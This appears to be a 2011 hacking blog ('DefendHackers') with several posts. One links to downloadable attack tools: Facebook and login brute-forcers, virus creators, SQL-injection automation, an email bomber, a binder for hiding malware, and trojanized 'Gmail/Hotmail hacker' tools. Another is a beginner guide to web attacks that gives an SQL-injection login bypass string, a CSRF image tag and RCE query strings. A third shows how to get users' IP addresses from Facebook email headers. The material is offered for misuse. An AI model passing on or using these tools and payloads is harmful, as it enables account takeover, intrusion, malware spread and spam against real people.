Connect With Me In Facebook

Welcome to DefendHackers, If u want to Apply for a Blogroll as a Author , With h4ckfreak Mail me @ suren.click@gmail.com

Mark Zuckerberg tells 8th graders “there’s no shortcuts” and to make friends

By h4ckfreak

Metasploit Quick Start Referennce Guide

Metasploit Quick Start Referennce Guide , By h4ckfreak

IP Security

IP Security By H4ckfreak.

15 Network Admin Apps for Android

15 Network Admin Apps for Android , By h4ckfreak

Break All OS Passwords Using KON

Break All OS Passwords Using KON , By h4ckfreak

Recover Or Reset Ur Windows Pwd Using Ubuntu

Recover Or Reset Ur Windows Pwd Using Ubuntu , By h4ckfreak

Security Blueprint For Ethical Hackers..

By h4ckfreak

Blocking IP Using IPSec

By h4ckfreak

Preventing DDos Attacks, Combat Steps abd Tools...

By h4ckfreak

Thursday, March 31, 2011

Tools For BLACK, WHITE, GRAY HATS (Updated)


Facebooz
Many people were asking on how to hack facebook account. This tool is design to hack any facebook account you want with 2 simple steps. Specify the username and the pass list and let it work.
It will hack that account and give you the pass.
And for idiots who say that it doesn't work. Well it works but it need times between each attemd to login otherwise it will become a facebooz freezer

http://uploading.com/files/8b949bb8/facebooz.jar/

                             

Brutus
This tool will hack for you any login page by trying all password possibilities. The reason i added here is because many people were finding troubles with there brutus and couldn't do any hack so this one should solve all there nightmares.ha ha ha
http://uploading.com/files/ba745666/Brutus.rar/   

(For readymade logins u can reach www.bugmenot.com)


PassList Generator




Many days ago someone post here in the forum a pass list that is 2GB size. I know that some people cannot download such a file including me so i did some search and found this tool. This software should create the pass list that you need to your brute force. Very small size but very big efficiency.
http://uploading.com/files/f8f9769b/PLG.zip/




In Shadow Batch Virus Gen - 4.1.2



This tool is a virus creater. It will create very proffesional virus. Never test any virus on your PC. Very effective for bad hackers.
password with no quotes: "In shadow"

http://uploading.com/files/FZRK98VO/In%2...2.zip.html


Atomics Virus Creator V.65
This tool is a virus creater. It will create very proffesional virus. Never test any virus on your PC. Very effective for bad hackers
http://uploading.com/files/6CZZN22N/Atom...5.zip.html


Now I will post 3 tools that should be downloaded toghether for better results.
Exploitscanner



This tool will search for vulnarable websites. You only have to write the dock and it will search for potential website to hack. Always use inurl:"article.php?id=1" as a dork.
http://uploading.com/files/19217P2R/expl...r.zip.html


SQL I Helper V.2.7
After you find your potential website , use this tool to auto hack the website using SQL injection. This tool will do all the hard job by itself. Just select buttons to tell here what to do.
You might need to find the pass using the hash method





Admin finder


After you findthe passwords , use this tool to find the admin page login. Some people are heaving problems finding that page. This should solve this problem but remember that can't find all login pages. It use the most common extensions. You have the ability to add more extensions to the list to increase your search range
http://uploading.com/files/KCDVDDST/admi...r.rar.html


cain and abel
Crack PC passwords , hack network connections , sniff , brute , ....................... and all your dirty job.
I don't think i need to explain what does this tool do. Everyone know about and how neccesary it for hacking job.

http://uploading.com/files/m55616a9/cain%2526abel.rar/


w32 disassembler degguer
This tool will help you to disassemble any program you want. Very effective for programmers
http://uploading.com/files/CX9JY7UR/w32%...r.rar.html


72389 Email Bomber
This tool will help you to spam any email you want. This one is special because you have the ability to spam from different email at the same time. All credit go to Nathan72389
http://uploading.com/files/ZC2HM6E1/7238...r.rar.html


Simple Binder
Use this tool to bind any 2 files in a single file. You are not restricted to jpg or mp3 files but you can bind any type of file. It is very effective to hide virus and worms and all malwares type. All credits go Nathan72389
http://uploading.com/files/SEQDHH33/Simp...9.rar.html


Hotmail Hacker And Messenger Fun
This tool will help you to hack any Hotmail messenger you want. It simply work by making the person think he can hack email using it while in the reality he is the one to be hacked. All credit go to Nathan72389
http://uploading.com/files/9c8ae7f5/Hotm...2BFun.rar/


Gmail Hacker
This tool will help you to hack any Gmail you want. It simply work by making the person think he can hack email using it while in the reality he is the one to be hacked. All credit go to Nathan72389
http://uploading.com/files/d7f79mm9/Gmail%2Bhacker.rar/


Chat Spammer
Use this tool to spam any chat room. Write what phrase you want it to be spammed. I am still try to figure out the best way to use it. Very funny and worst to try it
http://uploading.com/files/D7YJGAI9/Chat...r.rar.html


1st Mass Mailer 4.2
This tool will help you to mass spam emails. Little bit compliacted but very very effective.
Serial: "18935379480889"
Thanks to 88power88 for the serial

http://uploading.com/files/17m9mc69/1stM...ler42.rar/


My lock box
Many people were asking for tools to hide files and folders. This tool will hide the files that you don't want anyone to see it by hiding it inside a box that the software create and to make it impossible to anyone to reach it. Very easy to use
http://uploading.com/files/O0PDO80I/mylo...p.exe.html


I lock
Same as the one before but this one is more proffessional. This tool will hide the files that you don't want anyone to see it by hiding it inside a box that the software create and to make it impossible to anyone to reach it.
http://uploading.com/files/9m8d4e29/ilockstp.rar/


Lock an exe
This tool will lock any ".exe" file by making it not working anymore. If you click on the new exe , it won't execute. Ability to share it between PCs safetly at a condition that these 2 pc have this tools to lock it and unlock it
http://uploading.com/files/XIG3N1MN/lockanexe.zip.html


Icon Changer v3.8
Some people were asking for tools that can change the icon for there files. Use this tool to change the icons of any thing you want on your PC. Customize anything that have a icon interference.
http://uploading.com/files/VJHMKK2V/Icon...8.zip.html



FYI...Using GMAIL HACKER tools is at ur Own rick..i cant claim any responsibility

Wednesday, March 23, 2011

Hacking The Websites, Methods (n00b Special)


Remote File Inclusion (RFI):
A method of uploading a shell by an off-site .

Local File Inclusion (LFI) AKA Directory traversal attack:
A method of pulling usernames and passwords off a website vulnerable to the exploit of
insufficient security validation / sanitization of user-supplied input file names.

Blind Structured Query Language Injection (blind SQLI):
Method of once again insufficiant security validation and sanitization of user-input.

Basic SQLi
This is the easiest method of SQLi. This method allows you to enter codes such as ' or '1'='1
into the username and password fields to gain access. E.g. you find the admin login on a site
and you may enter the correct username admin and the password as: ' or '1'='1.

Cross Site Scripting (XSS):
A method of injection html/javascript into a website. The can be both persistent attacks, and
non-persistant.


Cross site request forgery (CSRF):
An attack that is commonly sent by e-mail or other means and often tricks a user. given to a target may include HTML, something like this:
Code:
<img src="http://bank.example/withdraw?account=bob&amount=100&for=mallory" height="1" width="1" border="0">
And this will be activated through the victims browser and the site will think it was a valid and intentional move.

Public Exploits:
Public exploits are just scripts that people have released for others to use. Such as
this exploit which exploits a webserver
running this program on one of its open ports. I suggest you have a quick look through the
script to see how/why it works. The way of finding which software you target is using is by using Namp or the GUI Zenmap

DNS hijacking:
This is the method or redirecting the domain name to a rouge domain name. This method is used
particually in phishing attacks.

Bruteforcing:
This method is the practise of running a program to keep guessing the password and username of
a site. This method is fastly going out of fashion as the max login attempts are added and even
without this obstical, it can take weeks to gain the correct password. Programs commonly used
for this are hydra and Brutus.

Password Guessing:
Yes, just as it sounds. This is the method of just guessing common passwords such as:

Code:
admin
admin123
321admin123
password
toor
thesitesname

Packet Sniffing:
If you find a site with FTP access, there may be a chance you can use a tool such as
cain and abel to sniff their password and username when
the login. Not a very easy task as the trafic is sometimes encrypted.

RCE (Remote Command Execution):

This is the method of making the server read command that you have entered for it to.
E.g.
Code:
index.php?cmd=whoami
index.php?cmd=net user


Social Enginering:
A common method used to gain information. This can be a long process, but an effective one.
They can patch software, but it will always be people's ignorance that will let you/your target
down.

Cookie poisoning:
This is a method of editing cookies you have already gained, to gain extra privileges. Not a very common method now as of cookies being encrypted, and having to be signed. This exploit can work on some surprising sites, take a look, you may be surprised.

Parameter tampering:  (And i think is method is Often called As SESSION HIJACKING, correct me if i am wrong)

An attack usual done by moderfying values in the url. E.g. changing a value to decrease the amount you have to pay on something.
Code:
<input type=”hidden” id=”1008” name=”cost” value=”70.00”>

In this example, an attacker can modify the “value” information of a specific item, thus lowering its cost.
source: http://www.owasp.org/index.php/Web_Parameter_Tampering

Tamper Data:
A very nifty Firefox addon which is used to modify http/https headers and post parameters.

Admin Auth bypass:
This exploit can be as simple as adding:
Code:
?action=edit
To a URL. This exploit when a server/application allows you to edit by having the valid URL, instead of by cookies. Another method of admin auth bypass is editting the html to proceed even if the password is wrong.


Thursday, March 17, 2011

INFO GATHERING - Forensic Tool




Gotta Great Stuff for u all Indians, Regarding Fornsic, Recently INDIATRACE Launched a website ,To trace, Mobile numbers,Zip Codes, Vehicle Number e.t.c…This website is Connected to all the Phone Operators Databases(So Don Ask me Suddely, Operator DB are Standalone, I Know), Here Am talking about the Centralised  DataBase, that is in New Delhi(I don kno how many of u know about it, Well u may be known, If u read a article in “INDIA Today “ about 2 months ago , Regarding Phone Tapping of POLITICIANS,  )  The artilcle Fully Showcased , What is Phone tapping , and How they are Doing it..Wanna Kno more about Private me…and INDIA TRACE is once of Top Notch Websites Used By CBI For Forensics Stuffs, Let me tell you the service Offered Bu Indiatrace..


1.       TRACE MOBILE NUMBER(Location,State,place,Geo Info),
2.       Trace Vehicle Number
3.       Trace Fixed Line Number
4.       Trace IP Address
5.       Trace Pin Code
6.       Trace Bulk SMS Sender
7.       Trace STD Code
8.       Trace People
9.       Reverse DNS
10.   NS Lookup
11.   Tracebox
12.   Domain WHOIS Trace
13.   Find DNS Registry Status
14.   Find Yahoo Online search
15.   Find Website Ranking

Woes..well  I too Raised my eyebrow,After Have Been Looked up By this Services Offered..ITS A STANDALONE WEBSITE..

Friday, March 11, 2011

Facebook Hacking Finding the Target, Mar, 2011(UPDATED)

Hell Ya..i just wasted my time By watching 2011, "BATTLE OF LOS ANGELS" This Movie is a Bunch of Holy craps, But People or Family Who sent a Guy to ARMY May lit a drop of tears..i agree with tat..Lets back to Business here lemme tell u folks, This is Truly for Educational Purposes, I Jus got this From a friend in a Forum, I Told him tat am not gonna release..But As i told before just sharing for edu Purposes and Its Exclusively Only On DEFENDHACKERS, Peoples Often wanna kno  IPs from Facebook messages. I myself have participated in forums where I said it wasn't something you could do because Facebook keeps the IPs of the users in their system. That was until I noticed something ... peculiar ... about the notification emails that are sent to my email address. 


Depending on your email preferences, you will be familiar with the subject line: "<Facebook user> sent you a message on Facebook...", or "<Facebook user> commented on a photo of you on Facebook..." -- the headers of these messages should just tell you IP addresses of mail servers in Facebook's network, right? Yes, but it will also tell you the IP of the user. It wasn't immediately obvious to me because they are Base64 encoded. But sure enough, Facebook is nice enough to note the IP address of the user they're notifying you about. Get a message? Get a comment? Get a link? Whatever user is in that notification email, Facebook forwarded their IP to you.

In the headers, look for the line that says "X-Facebook". Here's an example:

X-Facebook: from ADRIANLAMO(He is ma Inspiration all tha time,and he get himelf wit Drugs n Stuffs) ([OTcuODMuMjEuMjM=]) by www.facebook.com with HTTP (ADRIAN LAMO);
  
It never really occurred to me when I would read over these headers. But: Grab a Google search engine and type in "Base64 convert" or something similar, and decode "OTcuODMuMjEuMjM=" into ASCII: 97.83.21.23

Why does Facebook do this? Probably to give them something to go on in cases of abuse. Maybe it's for their own testing purposes, as Facebook staff members undoubtedly have accounts themselves, and they can verify IP addresses when they get test messages. Who knows?

Sent someone a Facebook comment and they miraculously know your IP, and you don't know how? There ya go.  This is How...

And i See Some peoples really want to help regarding my English, LOL am makin Hell lotta mistakes i barely kno, But i Asked Some of ma US Friends. JOHNSON(Name Changed) ..He knows tat am makin Hell lotta mistakes, BUT STILL he Said "DUDE UR ENGLISH IS TOP NOTCH"  ..Ha ha ha ha..So Drop Comments n feedbacks always...
LAT3R
H4ckfreak

Thursday, March 10, 2011

Obama Wants New Taxes for National Broadband Network

Wow,Long time Noo See.. okay, in the U.S. ,a huge national broadband plan the FCC proposed creates a national policy for the taxation of digital goods and services imposing a fee to create a national public safety wireless broadband network. Being a network guy, Especially Grey Hat expert(Well I have atleast talk about myself in this corner little..Lol), I am all for expanding the wireless networks!
However, the Obama administration has a plan to do it with more taxes and higher fees. Nice.. new taxes and fees, couldn’t be better timing.
What I don’t understand is why this new ridiculous plan proposes a new tax to create this safety wireless broadband network - I thought this is why we pay taxes in the first place? This reminds me of my homeowner  adding Xtra Room Charges  and surcharges for Pain tha Building,and Maintanence Blah blah, which is the reason I was told why we pay HOA fees in the first place.

The FCC defends itself by saying this “new” national tax would eliminate the headaches that come with varying state and local taxes on digital goods and services. And the public safety network would help avoid the communication failures among first responders to the Sept.  terrorist attacks and Hurricanes Katrina and Rita. Always in the name of safety…if I could only sell HACKING books in the name of “keeping the U.S. safe”!
Okay, I am trying as hard as I can to make this blog politics free, but come on! America is in a deep recession and now the Obama policies want to RAISE taxes on taxes that are already being raised to pay for healthcare, bank bailouts, the housing crisies, ad nasum….insert your reason here….But wait, is this just a U.S issue? Far from it! This started in the U.K in 2008 and we’re just seeing it here with net neutrality issues, and add the IPv4 address allocation issues – I am getting exahusted from thinking about it


h4ckfreak